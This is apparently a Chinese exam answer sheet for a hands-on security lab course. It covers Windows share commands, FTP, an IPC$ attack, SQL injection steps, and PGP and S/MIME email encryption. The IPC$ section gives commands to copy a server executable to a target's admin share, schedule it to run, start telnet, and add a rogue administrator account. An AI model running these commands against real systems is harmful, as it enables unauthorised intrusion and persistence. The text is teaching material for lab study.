信息安全技术与实施-实操考试是题答案.pdfVIP

网络安全技术实验 net share zzz=d:\zzz 共享 d:\zzz 共享名为 zzz net use \\ip\zzz 123 /user:zero 用户 zero 密码 123 连接共享 copy \\ip\zzz\xxx.xxx C:\xxx.xxx 从共享复制 xxx.xxx 到 C:\xxx.xxx [添加管理员用户] net user zero 123 /add 添加 zero 用户 密码为 123 net localgroup administrators zero /add 添加 zero 到 administrators 用户组 ftp open ?.?.?.? 用户名 密码 put x:\xxx.xxx 上 get xxx.xxx x:\xxx.xxx 下载 bye 退出 [IPC$攻击] net use \\ip\ipc$ /user: copy C:\Server.exe \\ip\ipc$ [计划任务] net time \\ip 查看 ip 当前时间 at \\ip time Server.exe telnet ip 添加管理员用户如上题 一.熟悉常见的系统命令 在命令行下完成以下命令的功能使用： Net share （创建共享文件夹） C:\md 56 C:\net share 56=c:\56 56 共享成功。 Net use （访问并复制共享文件夹中的内容到本地计算机） net use \\ip\zzz 123 /user:zero 用户 zero 密码 123 连接共享 copy \\ip\zzz\xxx.xxx C:\xxx.xxx 从共享复制 xxx.xxx 到 C:\xxx.xxx Net user （创建用户账号、并将用户添加到管理员组） ftp （完成FTP 的上传、下载） (一) IPC$攻击 利用 IPC$漏洞对未打补丁的 Windows 计算机实施攻击 主要步骤： 1. 扫描 IPC$计算机 2. 将 Server.exe 程序上传到目标机器 E:\实验工具\IPC$攻击工具net use E:\实验工具\IPC$攻击工具copy E:\实验工具\IPC$攻击工具\SRV.EXE \\1\e$\SRV.EXE 3. 为目标计算机指定计划任务 E:\实验工具\IPC$攻击工具at \\1 19:33 srv.exe 4. 用 Telnet 命令连接 sc \\1 start tlntsvr telnet 1 5. 添加管理员账号 E:\net user lijietian sotian /add E:\net localgroup administrators lijietian /add (二) SQL 注入漏洞提权 1. 将嘉枫文章管理系统发布到 IIS 上 2. 用 domain4.1 进行旁注检测 3. 猜解表名 4. 猜解列名 5. 破解用户名、密码 6. 管理入口扫描 7. 用得到的管理员账号登录 (三) 电子邮件安全（PGP） 用 PGP 实现电子邮件的加密/签名和解密/校验 1. 配置 Outlook Express 可正确收发邮件 2. 产生密钥对 3. 导入对方公钥 4. 签名并信任对方公钥 5. 成功发送加密邮件，成功解密密文 6. 成功发送签名邮件，正确验证签名 7. 成功发送加密并签名邮件，正确解密校验邮件 (四) 电子邮件安全（S-MIME ） 用 Outlook Express 自带的安全功能实现电子邮件的加密/签名和解密/校验 1. 配置 Outlook Express 可正确收发邮 2. 下载安装 CA 证书’ 3. 申请并下载安装电子邮件安全证书 4. 获得对方的数字标识 5. 成功发送加密邮件，成功解密密文 6. 成功发送签名邮件，正确验证签名 7. 成功发送加密并